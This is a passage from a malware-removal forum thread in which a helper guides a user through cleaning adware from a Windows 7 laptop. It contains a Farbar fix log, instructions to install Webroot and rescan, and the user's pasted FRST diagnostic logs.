HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{73F1ECDA-E878-4546-961F-1A64753EA16E} => Key not found.
C:\Windows\System32\Tasks\SmartDefrag3_Startup not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SmartDefrag3_Startup => Key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{890EE660-61F4-4441-A4B3-66BE385978EB} => Key not found.
C:\Windows\System32\Tasks\ASC8_SkipUac_John not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ASC8_SkipUac_John => Key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA55BC07-9D8B-4B05-84F9-3DEA9F26C048} => Key not found.
C:\Windows\System32\Tasks\Driver Booster SkipUAC (John) not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Driver Booster SkipUAC (John) => Key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C190163D-888F-4F09-BEA5-EB4E6D0D0C36} => Key not found.
C:\Windows\System32\Tasks\Driver Booster Update not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Driver Booster Update => Key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CAE18874-F60E-4A7F-851F-69D0DD6D6E70}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CAE18874-F60E-4A7F-851F-69D0DD6D6E70}" => Key deleted successfully.
C:\Windows\System32\Tasks\Uninstaller_SkipUac_Administrator => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Uninstaller_SkipUac_Administrator" => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CE90F2B6-3A0E-48C7-9779-C70824FB3438} => Key not found.
C:\Windows\System32\Tasks\SmartDefrag3_Update not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SmartDefrag3_Update => Key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F28CB2D1-C20D-4E37-8E15-10F216172851} => Key not found.
C:\Windows\System32\Tasks\Uninstaller_SkipUac_John not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Uninstaller_SkipUac_John => Key not found.
C:\Users\John\AppData\Roaming\LavasoftStatistics => Moved successfully.
C:\Windows\SysWOW64\LavasoftTcpService.ini => Moved successfully.
C:\Windows\SysWOW64\LavasoftTcpServiceOff.ini => Moved successfully.
C:\Windows\system32\LavasoftTcpServiceOff.ini => Moved successfully.
C:\Windows\system32\LavasoftTcpService64.dll => Moved successfully.
C:\Windows\SysWOW64\LavasoftTcpService.dll => Moved successfully.
C:\Users\John\Downloads\Adaware_Installer.exe => Moved successfully.
C:\Users\John\Downloads\7A2E.tmp => Moved successfully.
"C:\Windows\System32\Tasks\SmartDefrag3_Startup" => File/Directory not found.
"C:\Windows\System32\Tasks\SmartDefrag3_Update" => File/Directory not found.
"C:\Windows\System32\Tasks\Driver Booster Update" => File/Directory not found.
C:\Windows\Tasks\ImCleanDisabled => Moved successfully.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Booster 2" => File/Directory not found.
C:\Program Files (x86)\YoutuubeAdBllooCke => Moved successfully.
C:\Program Files (x86)\Free Visio Viewer => Moved successfully.
"C:\ProgramData\lbihihaaofomgcababbmjgbblobipmib" => File/Directory not found.
C:\ProgramData\15431041915562449580 => Moved successfully.
"C:\Users\John\Downloads\IObit-Malware-Fighter-Setup.exe" => File/Directory not found.
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\IMFservice => Key not found.
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc" => Key deleted successfully.
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc" => Key deleted successfully.
EmptyTemp: => Removed 611.4 MB temporary data.


The system needed a reboot.

==== End of Fixlog 23:34:19 ====

 

I did have to restart the computer. I also have purchased Webroot Internet Security but have not installed it on this computer.

 

 


  • 0

#10
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts
Hello, snoopdog1951.

Are you going to install Webroot Internet Security on this computer? If you are, you should do it now. If you're not, do not proceed and just tell. And I'll give you some suggestions for other antivirus programs..

However, if you want Webroot Internet Security, then install it now.
After the installation, do the following:

FRST Scan
  • Right click FRST64.exe and click Run as administrator. When the tool opens click Yes to disclaimer.
  • Make sure that Addition.txt is checked and press the Scan button.
  • It will produce two logs - one called FRST.txt and another one called Addition.txt in the same directory the tool is run from.
  • Select all (CTRL+A) the content of both of the logs, copy them (CTRL+C) and paste (CTRL+V) them into your next reply.

  • 0

Advertisements


#11
snoopdog1951

snoopdog1951

    Member

  • Topic Starter
  • Member
  • PipPip
  • 17 posts

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 07-01-2015
Ran by John at 2015-01-09 16:28:34
Running from C:\Users\John\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Webroot SecureAnywhere (Enabled - Up to date) {66A6FE14-08CB-F415-3742-517201416109}
AS: Webroot SecureAnywhere (Enabled - Up to date) {DDC71FF0-2EF1-FB9B-0DF2-6A007AC62BB4}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Accidental Damage Services Agreement (HKLM-x32\...\{EF85FEF4-EB92-4075-A6D2-5F519BB30A2C}) (Version: 2.0.0 - Dell Inc.)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 15.0.0.356 - Adobe Systems Incorporated)
Adobe Flash Player 16 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 16.0.0.235 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.235 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10)  MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Advanced Audio FX Engine (HKLM-x32\...\Advanced Audio FX Engine) (Version: 1.12.05 - Creative Technology Ltd)
Banctec Service Agreement (HKLM-x32\...\{42D68A86-DB1C-4256-B8C9-5D0D92919AF5}) (Version: 2.0.0 - Dell Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Complete Care Business Service Agreement (HKLM-x32\...\{0ECFCB07-9BFE-4970-ACA1-D568D982760B}) (Version: 2.0.0 - Dell Inc.)
Consumer In-Home Service Agreement (HKLM-x32\...\{F47C37A4-7189-430A-B81D-739FF8A7A554}) (Version: 2.0.0 - Dell Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery - Support Software (HKLM-x32\...\{A9668246-FB70-4103-A1E3-66C9BC2EFB49}) (Version: 1.5.0.0 - Dell Inc.)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.5.0.0 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{BC8233D8-59BA-4D40-92B9-4FDE7452AA8B}) (Version: 3.0.3999.0 - Dell Products, LP)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Home Systems Service Agreement (HKLM-x32\...\{AB2FDE4F-6BED-4E9E-B676-3DCCEBB1FBFE}) (Version: 2.0.0 - Dell Inc.)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 17.0.8.1 - Synaptics Incorporated)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version: 1.40.05 - Creative Technology Ltd)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.)
DIRECTV Player (HKLM-x32\...\{437f5443-c052-432c-b1e7-abd9bc5cabdb}) (Version: 11.0 - DIRECTV)
DSC/AA Factory Installer (Version: 3.4.6299.48 - PC-Doctor, Inc.) Hidden
eBay (HKLM-x32\...\{A8B88634-7F90-402F-B66A-86429755F6A5}) (Version: 1.4.0 - eBay Inc.)
Epson Event Manager (HKLM-x32\...\{48F22622-1CC2-4A83-9C1E-644DD96F832D}) (Version: 2.30.01 - SEIKO EPSON Corporation)
EPSON NX510 Series Printer Uninstall (HKLM\...\EPSON NX510 Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - )
EpsonNet Print (HKLM-x32\...\{3E31400D-274E-4647-916C-2CACC3741799}) (Version: 2.6.0 - SEIKO EPSON CORPORATION)
EpsonNet Setup (HKLM-x32\...\{FFFAE01B-466F-4C07-9821-A94FD753BDDA}) (Version: 3.1c - SEIKO EPSON CORPORATION)
FUJIFILM MyFinePix Studio 3.2 (HKLM-x32\...\MyFinePix Studio_is1) (Version:  - )
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google+ Auto Backup (HKLM-x32\...\{A50DE037-B5C0-4C8A-8049-B0C576B313D1}) (Version: 1.0.21.81 - Google)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.3.1520 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.18.10.3234 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.7.1.1000 - Intel Corporation)
Junk Mail filter update (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Access database engine 2010 (English) (HKLM-x32\...\{90140000-00D1-0409-0000-0000000FF1CE}) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4454.1510 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Streets & Trips 2013 (HKLM-x32\...\{C82185E8-C27B-4EF4-2013-4444BC2C2B6D}) (Version: 19.0.17.2200 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 34.0.5 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 34.0.5 (x86 en-US)) (Version: 34.0.5 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 34.0.5 - Mozilla)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
Premium Service Agreement (HKLM-x32\...\{C33AA6D6-F5EC-48F3-AFDC-8141345D473A}) (Version: 2.0.0 - Dell Inc.)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.230 - Qualcomm Atheros Communications)
QualxServ Service Agreement (HKLM-x32\...\{903679E8-44C8-4C07-9600-05C92654FC50}) (Version: 2.0.0 - Dell Inc.)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 10.16.002 - Dell Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7246 - Realtek Semiconductor Corp.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Sudoku Puzzle Addict (HKLM-x32\...\{C03E8D2E-3526-4C5D-9744-86FBBC098C43}) (Version: 1.00.0000 - GSP)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Warcraft II BNE (HKLM-x32\...\Warcraft II BNE) (Version:  - )
Webroot SecureAnywhere (HKLM-x32\...\WRUNINST) (Version: 8.0.6.44 - Webroot)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-1973512931-3336358897-1288466322-1001_Classes\CLSID\{E86236DE-9BD2-42b7-86F6-A829D8EC768C}\InprocServer32 -> C:\Users\John\AppData\Local\DIRECTV Player\win64\npPlayerPlugin64.dll (Cisco)

==================== Restore Points  =========================

26-12-2014 12:09:04 AA11
26-12-2014 12:12:41 LavasoftWeCompanion
26-12-2014 12:27:15 AA11
26-12-2014 12:40:10 IObit Uninstaller restore point
26-12-2014 19:17:08 IObit Uninstaller restore point
26-12-2014 22:58:15 IObit Uninstaller restore point
26-12-2014 22:58:47 AA11
26-12-2014 23:03:01 IObit Uninstaller restore point
26-12-2014 23:03:22 LavasoftWeCompanion
29-12-2014 17:03:56 IObit Uninstaller restore point
29-12-2014 17:06:54 IObit Uninstaller restore point
31-12-2014 09:56:29 Windows Update
05-01-2015 11:39:37 IObit Uninstaller restore point
05-01-2015 11:42:00 IObit Uninstaller restore point
06-01-2015 09:33:03 Windows Update
07-01-2015 11:46:01 IObit Uninstaller restore point
08-01-2015 23:12:41 IObit Uninstaller restore point
08-01-2015 23:13:40 IObit Uninstaller restore point
08-01-2015 23:14:32 IObit Uninstaller restore point
08-01-2015 23:15:29 IObit Uninstaller restore point
08-01-2015 23:16:12 IObit Uninstaller restore point
08-01-2015 23:17:29 IObit Uninstaller restore point
08-01-2015 23:18:19 IObit Uninstaller restore point
08-01-2015 23:19:29 IObit Uninstaller restore point
08-01-2015 23:33:21 Restore Point Created by FRST

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 20:34 - 2009-06-10 15:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {0D874672-9B6F-4886-9F60-E8BE77F6DA3C} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-01-31] (PC-Doctor, Inc.)
Task: {16C08E06-9BC7-40BB-BF3A-30A994E715F2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-15] (Google Inc.)
Task: {2042D263-2E5C-484E-814A-3C29EF2D579F} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {3A7353BA-F60D-4F60-B727-9373518B5F94} - System32\Tasks\PCDoctorBackgroundMonitorTask-Retry => C:\Program Files\My Dell\uaclauncher.exe [2014-01-31] (PC-Doctor, Inc.)
Task: {4164D968-2170-4D8B-A90C-CF156F6E67C5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-15] (Google Inc.)
Task: {6363D9C5-CDFA-45D6-9C63-B518B08A28BC} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-31] (PC-Doctor, Inc.)
Task: {E413B16F-DDDF-4E61-8738-12A8E92C53CC} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-12-26] (Adobe Systems Incorporated)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2013-06-28 12:12 - 2013-06-28 12:12 - 00034304 _____ () C:\Windows\System32\ssj1mlm.dll
2013-11-24 01:27 - 2013-04-19 15:51 - 00020256 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIcon.dll
2013-11-24 01:27 - 2013-04-19 15:52 - 00049440 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\STCommonShellIntegration.dll
2013-11-24 01:27 - 2013-04-19 15:51 - 00019232 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayNotBackuped.dll
2013-11-24 01:27 - 2013-04-19 15:51 - 00034080 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRShellExtension.dll
2013-07-02 22:51 - 2013-07-02 22:51 - 00086016 _____ () C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Modules\Map\MAP.dll
2014-09-16 13:51 - 2014-09-16 13:51 - 01387880 _____ () C:\Users\John\AppData\Local\DIRECTV Player\NDSPCShowServer.exe
2014-01-15 18:13 - 2009-03-12 15:45 - 00135168 ____N () C:\Program Files (x86)\Epson Software\Event Manager\Assistants\Scan Assistant\ScanEngine.dll
2014-01-15 18:13 - 2008-11-21 13:58 - 00057344 ____N () C:\Program Files (x86)\Epson Software\Event Manager\Assistants\Scan Assistant\Satwain.dll
2014-09-16 13:51 - 2014-09-16 13:51 - 11475296 _____ () C:\Users\John\AppData\Local\DIRECTV Player\PCShowServer.dll
2014-09-16 13:51 - 2014-09-16 13:51 - 02948448 _____ () C:\Users\John\AppData\Local\DIRECTV Player\DrmSingleton.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 00339296 _____ () C:\Users\John\AppData\Local\DIRECTV Player\ndsLogStore.dll
2014-09-16 13:51 - 2014-09-16 13:51 - 02106728 _____ () C:\Users\John\AppData\Local\DIRECTV Player\DiscoveryManager.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 00689000 _____ () C:\Users\John\AppData\Local\DIRECTV Player\libgstreamer-0.10.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 01403224 _____ () C:\Users\John\AppData\Local\DIRECTV Player\libxml2-2.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 00091976 _____ () C:\Users\John\AppData\Local\DIRECTV Player\z.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 00205672 _____ () C:\Users\John\AppData\Local\DIRECTV Player\libgstbase-0.10.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 00060272 _____ () C:\Users\John\AppData\Local\DIRECTV Player\libgstinterfaces-0.10.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 00043880 _____ () C:\Users\John\AppData\Local\DIRECTV Player\libgstvideo-0.10.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 00044896 _____ () C:\Users\John\AppData\Local\DIRECTV Player\libgstapp-0.10.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 08296288 _____ () C:\Users\John\AppData\Local\DIRECTV Player\gsttspplugin.dll
2014-11-24 11:39 - 2014-11-24 11:39 - 00155528 _____ () C:\Program Files (x86)\Dell Digital Delivery\ServiceTagPlusPlus.dll
2013-11-24 01:14 - 2013-06-01 06:31 - 01199576 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRkrn => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRSVC => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Administrator (S-1-5-21-1973512931-3336358897-1288466322-500 - Administrator - Disabled)
Guest (S-1-5-21-1973512931-3336358897-1288466322-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1973512931-3336358897-1288466322-1002 - Limited - Enabled)
John (S-1-5-21-1973512931-3336358897-1288466322-1001 - Administrator - Enabled) => C:\Users\John

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/09/2015 04:25:36 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/09/2015 04:21:20 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program FRST64.exe version 7.1.2015.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 65c

Start Time: 01d02c59cacb0487

Termination Time: 60000

Application Path: C:\Users\John\Desktop\FRST64.exe

Report Id: a483049e-984d-11e4-924e-645a04abf913

Error: (01/09/2015 04:04:14 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/08/2015 11:37:36 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/08/2015 11:33:21 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.


Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {eb8d39c4-9ca2-4927-bfdc-3123ecb92e11}

Error: (01/08/2015 11:22:25 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/07/2015 00:40:21 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/05/2015 11:45:36 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/05/2015 11:43:12 AM) (Source: AdvancedSystemCareService8) (EventID: 0) (User: )
Description: The handle is invalid

Error: (01/05/2015 11:43:12 AM) (Source: AdvancedSystemCareService8) (EventID: 0) (User: )
Description: The handle is invalid


System errors:
=============
Error: (01/09/2015 04:24:59 PM) (Source: Microsoft-Windows-WHEA-Logger) (EventID: 18) (User: NT AUTHORITY)
Description: A fatal hardware error has occurred.

Reported by component: Processor Core
Error Source: 3
Error Type: 9
Processor ID: 0

The details view of this entry contains further information.

Error: (01/09/2015 04:24:56 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOHN-PC        :20" could not be registered on the interface with IP address 192.168.0.10.
The computer with the IP address 192.168.0.3 did not allow the name to be claimed by
this computer.

Error: (01/09/2015 04:24:56 PM) (Source: Server) (EventID: 2505) (User: )
Description: The server could not bind to the transport \Device\NetBT_Tcpip_{0FE2EC0A-CBB7-4679-9CDB-F2977D6F1716} because another computer on the network has the same name.  The server could not start.

Error: (01/09/2015 04:24:44 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOHN-PC        :0" could not be registered on the interface with IP address 192.168.0.10.
The computer with the IP address 192.168.0.3 did not allow the name to be claimed by
this computer.

Error: (01/09/2015 04:03:41 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOHN-PC        :20" could not be registered on the interface with IP address 192.168.0.10.
The computer with the IP address 192.168.0.3 did not allow the name to be claimed by
this computer.

Error: (01/09/2015 04:03:41 PM) (Source: Server) (EventID: 2505) (User: )
Description: The server could not bind to the transport \Device\NetBT_Tcpip_{0FE2EC0A-CBB7-4679-9CDB-F2977D6F1716} because another computer on the network has the same name.  The server could not start.

Error: (01/09/2015 04:03:24 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOHN-PC        :0" could not be registered on the interface with IP address 192.168.0.10.
The computer with the IP address 192.168.0.3 did not allow the name to be claimed by
this computer.

Error: (01/08/2015 11:37:02 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOHN-PC        :20" could not be registered on the interface with IP address 192.168.0.10.
The computer with the IP address 192.168.0.3 did not allow the name to be claimed by
this computer.

Error: (01/08/2015 11:37:02 PM) (Source: Server) (EventID: 2505) (User: )
Description: The server could not bind to the transport \Device\NetBT_Tcpip_{0FE2EC0A-CBB7-4679-9CDB-F2977D6F1716} because another computer on the network has the same name.  The server could not start.

Error: (01/08/2015 11:36:50 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOHN-PC        :0" could not be registered on the interface with IP address 192.168.0.10.
The computer with the IP address 192.168.0.3 did not allow the name to be claimed by
this computer.


Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Processor: Intel® Core™ i5-4200U CPU @ 1.60GHz
Percentage of memory in use: 22%
Total physical RAM: 6032.36 MB
Available physical RAM: 4664.98 MB
Total Pagefile: 12062.9 MB
Available Pagefile: 10475.68 MB
Total Virtual: 8192 MB
Available Virtual: 8191.86 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:444.06 GB) (Free:371.39 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: B797F90B)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=21.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=444.1 GB) - (Type=07 NTFS)

==================== End Of Log ============================

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 07-01-2015
Ran by John (administrator) on JOHN-PC on 09-01-2015 16:27:43
Running from C:\Users\John\Desktop
Loaded Profile: John (Available profiles: John)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

